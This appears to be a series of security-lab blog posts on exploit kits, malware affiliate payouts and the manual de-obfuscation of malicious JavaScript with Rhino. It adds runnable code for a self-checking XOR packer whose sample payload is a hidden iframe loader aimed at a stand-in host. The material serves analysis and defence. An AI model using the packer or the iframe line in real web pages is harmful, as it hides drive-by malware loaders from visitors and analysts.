Kits for installing malware -> Traffic Pro
We have written quite a few times about kits for installing malware, such as MPack and IcePack. Vicente has been studying another kit, called Traffic Pro, for a while. Although it is older than MPack and IcePack, it is cheaper (about $20-$40), which is why it has become so popular.
The control panel sits behind the typical login page:
The panel also lets you review every infection in detail:
For a detailed explanation of how it works, take a look at the report written by Vicente.
Greetings from Vienna
Virus Bulletin 2007 is taking place this week at the Hilton Vienna Hotel. The event, which starts today and ends on Friday, offers a wide range of interesting talks on the usual topics in the security field: crimeware, spam, phishing and all kinds of malware and anti-malware techniques. The program can be viewed here.
Easy money: affiliate programs
Today we are going to describe one of the ways cybercriminals earn easy money. Many marketing companies pay for web traffic driven to particular web pages, for software installations and so on. They run what they call 'affiliate programs', paying for every install made or visit generated. The traffic they accept comes in many forms: ActiveX controls, rogue anti-spyware, bundles, banners, fake codecs, iframes, etc.
Rates depend on the country the install comes from. Normally the USA and Europe are the best paid, and countries such as China or Russia are the worst paid.
Here is an example rate card taken from one of these sites:
We will pay you for installs coming from 16 countries as exposed here:
$0.40 for USA, Canada
$0.20 for United Kingdom, France, Germany, Italy, Spain, Belgium, Luxembourg, Monaco
$0.05 for Austria, Denmark, Finland, Sweden, Norway, The Netherlands
$0.01 for China, Korea, Japan
Although some of these marketing businesses may be legitimate, others have been created specifically by and for cybercriminals. Here is a GIF that one of these companies used to advertise itself on an underground malware forum:
A short time ago, while analysing a Trj/Sinowal variant (a banking Trojan) to find out where it was sending the stolen information, we came across one of these sites. The same server that hosted the affiliate page also hosted four different kits for installing malware through exploits:

There was an IcePack, a Traffic Pro, a Prime Exploit System, and an unnamed, very basic kit that used only two exploits. The kits were dropping two Trojans: Trj/Galapoper and Trj/Sinowal. This is not the first time we have seen something like this.
The websites on which these programs promote themselves tend to be very eye-catching; here are some examples:
JavaScript de-obfuscation with Rhino
Last Friday I received a URL that used several exploits to spread malware and, as always, I started investigating it. As you may know, these sites use JavaScript to exploit browser, ActiveX or third-party vulnerabilities, and the JavaScript is obfuscated most of the time.
I do not like using a web browser to de-obfuscate this code, basically because the scripts are dangerous and I want to avoid an infection. I know that some researchers use debugging techniques to de-obfuscate these scripts, but I think there are safer, faster and more automated ways to do the same job.
I prefer to use Rhino for these tasks. Rhino is "an open-source implementation of JavaScript written entirely in Java". With this JavaScript engine and a Linux system I can de-obfuscate the code without touching a web browser. I also recommend the CanSecWest presentation Reverse Engineering Malicious Javascript by Jose Nazario, Ph.D. (Arbor Networks).
I am going to show the process with an example (the same JavaScript I received on Friday).
This is a special case because it uses a trick to detect modification of the code: arguments.callee.toString(), which returns the source code of the function it is called from. Any change to that function alters the final result, which defeats automated de-obfuscation.
The script has two functions: bodipyri(ii) and cynolapy(a1,b1). The function names are generated dynamically every time the page is loaded. Analysing the second function, I saw a return statement with an eval call:
function cynolapy(a1,b1)
{
if(!b1){
return eval(bodipyri("ZG9jdW1lbnQud3JpdGUoY[DELETED]2csIiIpKSk7")); }
[DELETED]
}
The function is first called with a single argument:
cynolapy('YSYsMTs5IHAkOGlvIid7ZDZ9IGo5cD4[DELETED]VrY2SVSXZnKzJakIk=');
so cynolapy returns the result of the eval.
I stripped out all the HTML, replaced the eval call with print, and ran Rhino against the file. This was the result:
document.write(cynolapy(a1,arguments.callee.toString().replace(/\s/g,"")));
The script calls the same function recursively, this time with a second argument. That argument is the well-known arguments.callee.toString() trick used to detect code modifications. By replacing eval with print I had changed the function's source, and therefore the value of the second parameter, and therefore the final result. That is what defeats automated de-obfuscation: this example has to be de-obfuscated by hand.
The expression arguments.callee.toString().replace(/\s/g,"") returns the source code of the cynolapy function with all whitespace stripped.
Therefore, to get the real JavaScript, the function has to be called with that second argument. I fetched the original script again (the copy with the eval call intact; as noted above, the function names change on every load) and added the following code at the end of the file:
print(cynolapy('YSYsMTs5IHAkNGlhIj97aDZ9[DELETED]24viw==', 'functiontumawyzu(a1,b1){if(!b1){returneval(cynolapy("ZG9[DELETED]returno;}'));
What I am doing here is calling cynolapy with the second parameter it expects. After running this code through Rhino, this is the resulting code:
The de-obfuscated code loads an iframe pointing at a second site, which serves exploits for several vulnerabilities: ANI/ANR, Java/ByteVerify, ADODB.Stream, ...
PandaLabs is developing an automated engine to de-obfuscate JavaScript, but sometimes it is not possible and we have to do it by hand.
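To make the trick concrete, here is an added example, constructed for this page and not code from the malicious sample or from PandaLabs, that replicates the pattern above and runs stand-alone under Rhino or Node: a decoder that derives its XOR key from its own source text, so that swapping eval for print changes the key, together with the three ways of calling it that the post walks through (untouched, tampered, and manual recovery with the expected key). Assumptions: hex stands in for the sample's base64, the function name cynolapy is reused for readability, cynolapy.toString() stands in for arguments.callee.toString() (which strict-mode engines reject), and the hidden payload is an invented string.

```javascript
// Added example (constructed for this page; not the sample's code).
// A self-checking decoder in the style described above: stage 1 derives the
// decryption key from the decoder's own source text, so any edit to the
// function (eval -> print included) silently changes the key.
// Assumptions: hex instead of the sample's base64; cynolapy.toString() instead
// of arguments.callee.toString() (rejected by strict-mode engines); the
// payload string below is invented.

// Hex helpers. The encoding is irrelevant to the trick.
function hexEncode(s) {
  var out = '';
  for (var i = 0; i < s.length; i++) {
    out += ('0' + s.charCodeAt(i).toString(16)).slice(-2);
  }
  return out;
}

function hexDecode(h) {
  var out = '';
  for (var i = 0; i < h.length; i += 2) {
    out += String.fromCharCode(parseInt(h.substr(i, 2), 16));
  }
  return out;
}

// Repeating-key XOR; symmetric, so one routine both packs and unpacks.
function xorWithKey(data, key) {
  var out = '';
  for (var i = 0; i < data.length; i++) {
    out += String.fromCharCode(data.charCodeAt(i) ^ key.charCodeAt(i % key.length));
  }
  return out;
}

// Stage 1 bootstrap, stored encoded like the sample's inner string. Decoded it is
//   cynolapy(a1, cynolapy.toString().replace(/\s/g, ""))
// i.e. it re-enters the decoder with the decoder's own whitespace-stripped
// source as the key.
var STAGE1 = hexEncode('cynolapy(a1, cynolapy.toString().replace(/\\s/g, ""))');

// The self-checking decoder.
function cynolapy(a1, b1) {
  if (!b1) {
    return eval(hexDecode(STAGE1));      // stage 1: derive the key and recurse
  }
  return xorWithKey(hexDecode(a1), b1);  // stage 2: b1 is the key
}

// The key the packer used: the untouched source with all whitespace removed.
function originalKey() {
  return cynolapy.toString().replace(/\s/g, '');
}

// Build a payload the way the kit's packer would.
function pack(plaintext) {
  return hexEncode(xorWithKey(plaintext, originalKey()));
}

// Case 1: run the code untouched; what a victim's browser would do.
function runUntouched(payload) {
  return cynolapy(payload);
}

// Case 2: the analyst's first attempt. After swapping eval for print the
// function text differs, so the key stage 1 would derive differs, and stage 2
// returns garbage instead of the payload.
function runWithTamperedKey(payload) {
  var tamperedSource = cynolapy.toString().replace('eval(', 'print(');
  return cynolapy(payload, tamperedSource.replace(/\s/g, ''));
}

// Case 3: the manual route from the post. Keep the original text, compute the
// key it expects and call stage 2 directly with that key.
function recoverManually(payload, untouchedSource) {
  return cynolapy(payload, untouchedSource.replace(/\s/g, ''));
}

// Constructed payload; a real kit would hide its iframe loader here.
var PLAINTEXT = 'document.write("<iframe src=http://example.invalid/ width=1 height=1></iframe>")';
var PAYLOAD = pack(PLAINTEXT);

// Rhino exposes print(); Node does not.
var show = (typeof print === 'function') ? print : console.log;
show(runUntouched(PAYLOAD));
show(recoverManually(PAYLOAD, cynolapy.toString()));
```

Run it with `java -jar js.jar file.js` under Rhino or `node file.js`; both print the recovered payload twice. One caveat when reproducing the key by hand, as the post does: the key must be the text the victim's browser would produce. Browsers return the literal source, whereas Rhino's Function.prototype.toString() has historically returned decompiled source, so it is safer to paste the function text from the captured page, whitespace stripped, than to let Rhino derive it.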